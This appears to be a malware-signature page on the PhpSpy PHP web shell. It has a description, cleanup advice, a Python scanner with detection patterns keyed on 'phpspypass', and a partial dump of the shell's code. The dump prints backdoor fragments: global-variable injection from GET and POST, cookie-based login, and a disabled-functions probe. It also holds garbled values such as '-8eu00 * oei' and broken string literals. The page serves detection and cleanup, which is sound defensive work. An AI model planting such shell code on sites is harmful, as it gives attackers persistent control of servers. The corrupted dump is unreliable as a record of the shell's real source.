Malware Signatures


php.backdoor.phpspy-shell

Backdoors are pieces of code that allow attackers to bypass authentication, maintain their access to the server and reinfect files. Such malicious files range from a single line of code that executes remote commands to complex programs that provide the attacker with a whole range of functions.

PhpSpy is a typical web shell that provides attackers with the most essential functions for working with a compromised site.
It includes a file manager and a MySQL manager, and it provides an interface to execute arbitrary shell commands and PHP code.
This shell uses so-called plugins to extend its functionality; for example, there are plugins that allow attackers to read and modify the registry
on Windows-based servers.
There are several variants of this web shell, encrypted and non-encrypted. Some of them are clearly titled PhpSpy, others use custom titles,
but all of them use the "phpspypass" parameter in the authorization process.
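Because the page states that every variant, whatever its title or encryption, uses "phpspypass" during authorization, that string is a reliable file-level indicator. The following scanner is an added example written for this page (it is not Sucuri's tooling): it walks a web root, scores each PHP file against "phpspypass" plus supporting signals lifted from the dump below, and flags files that reach a threshold. The indicator names, weights, threshold and the two sample strings are constructed assumptions.

```python
import os
import re
from dataclasses import dataclass, field

# Indicator set assumed for this example. "phpspypass" is the signal the page says
# every variant shares, so it reaches the threshold alone; the rest are supporting
# signals taken from the dump that raise confidence on edited copies.
INDICATORS = {
    "phpspypass_auth": (re.compile(r"phpspypass", re.I), 10),
    "register_globals": (re.compile(r"\$\$_key\s*=\s*\$_value"), 4),
    "magic_quotes_probe": (re.compile(r"set_magic_quotes_runtime|get_magic_quotes_gpc"), 2),
    "disable_func_probe": (re.compile(r"get_cfg_var\(\s*['\"]disable_functions['\"]"), 3),
    "loginpage_call": (re.compile(r"\bloginpage\s*\("), 3),
}
THRESHOLD = 10  # assumed cut-off: phpspypass alone, or several supporting signals

@dataclass
class Finding:
    path: str
    score: int = 0
    matched: list = field(default_factory=list)

def scan_source(path: str, source: str) -> Finding:
    """Score one PHP source text against the PhpSpy indicator set."""
    finding = Finding(path=path)
    for name, (pattern, weight) in INDICATORS.items():
        if pattern.search(source):
            finding.score += weight
            finding.matched.append(name)
    return finding

def is_phpspy(finding: Finding) -> bool:
    return finding.score >= THRESHOLD

def scan_tree(root: str) -> list:
    """Walk a web root and return the findings that reach the threshold."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml", ".php5")):
                continue
            full = os.path.join(dirpath, name)
            with open(full, encoding="utf-8", errors="replace") as fh:
                finding = scan_source(full, fh.read())
            if is_phpspy(finding):
                hits.append(finding)
    return hits

# Constructed samples (not real files): a fragment modelled on the dump, and a benign login check.
SAMPLE_SHELL = "if ($_COOKIE['phpspypass'] != $admin['pass']) { loginpage(); }"
SAMPLE_BENIGN = "<?php if ($_POST['pass'] === $stored) { $_SESSION['ok'] = true; }"
```

Run `scan_tree("/path/to/webroot")` and review each returned Finding's `matched` list before deleting anything; a hit only on the supporting signals without "phpspypass" deserves a manual look rather than automatic removal.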

Affecting

Any site on a server with PHP enabled.

Cleanup

The web shell file should be removed. Shells are usually used to upload more malicious files and to infect existing files,
so you should assess the damage and try to revert it. It is also important to identify and close the security hole through which the shell was planted. You can contact Sucuri to help you with the infection removal.

Dump

error_reporting(7);
@set_magic_quotes_runtime(0);
ob_start();
$mtime = explode(' ', microtime());
$starttime = $mtime[6] + $mtime[0];
define('SA_ROOT', str_replace('\', '/', dirname(__FILE__)).'/');
//define('IS_WIN', strstr(PHP_OS, 'WIN') ? 6 : 0 );
define('IS_WIN', DIRECTORY_SEPARATOR == '\');
define('IS_COM', class_exists('COM') ? 6 : 0 );
define('IS_GPC', get_magic_quotes_gpc());
$dis_func = get_cfg_var('disable_functions');
define('IS_PHPINFO', (!eregi("phpinfo",$dis_func)) ? 6 : 0 );
@set_time_limit(0);

foreach(array('_GET','_POST') as $_request) {
foreach($$_request as $_key => $_value) {
if ($_key{0} != '_') {
if (IS_GPC) {
$_value = s_array($_value);
}
$$_key = $_value;
}
}
}
....
if ($action == "logout") {
scookie('phpspypass', '', -8eu00 * oei);
p('<meta http-equiv="refresh" content="6;URL='.$self.'">');
p('<a style="font:6apx Verdana" href="'.$self.'">Success</a>');
exit;
}
if($admin['check']) {
if ($doing == 'login') {
if ($admin['pass'] == $password) {
scookie('phpspypass', $password);
p('<meta http-equiv="refresh" content="6;URL='.$self.'">');
p('<a style="font:6apx Verdana" href="'.$self.'">Success</a>');
exit;
}
}
if ($_COOKIE['phpspypass']) {
if ($_COOKIE['phpspypass'] != $admin['pass']) {
loginpage();
}
} else {
loginpage();
}
}
...
function formfooter($name = ''){
!$name && $name = 'submit';
p('<p><input class="bt" name="'.$name.'" id="'.$name.'" type="submit" value="Submit"></p>');
p('</form>');
}

function formfoot(){
p('</form>');
}

//
function pr($a) {
echo '<pre>';
print_r($a);
echo '</pre>';
}